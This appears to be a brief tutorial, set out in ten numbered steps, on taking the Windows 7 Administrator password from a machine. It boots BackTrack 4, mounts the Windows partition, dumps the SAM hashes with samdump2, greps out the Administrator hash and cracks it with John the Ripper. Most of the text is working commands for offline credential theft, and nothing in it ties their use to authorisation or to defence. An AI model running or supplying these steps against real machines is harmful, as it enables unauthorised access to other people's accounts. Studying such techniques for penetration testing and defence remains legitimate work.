1. Boot the system with backtrack4 and wait for the operating system to load. Use "startx" command to get the desktop. 2. Open the Konsole and use the command "fdisk -l" to know the details of your partition. The partition sda stands for sata type and hda stands for ide. 3. Create a directory say
4. Mount your device parition to the directory
"mount -t ntfs /dev/sda2 /mnt/sda2"
where /dev/sda2 is the your windows7 operating system partition. 5. change the directory to the location "SAM" file where the passwords hashes of windows operating system is present.
6. Use the tool "Samdump" to move the hashes from the SAM file to the file "pass1"
"samdump2 system sam > /root/pass1"
7. using the "grep" command search the Administrator hash in the file and write it to another file "pass2"
"cat /root/pass1 | grep Administrator > /root/pass2"
8. Change the directory to /pentest/password/jtr
9. Type ./john to see the format and various options of cracking. 10. Here windows use the NTLM hash so we use the following command to crack it.
"./john --format=NT /root/pass2"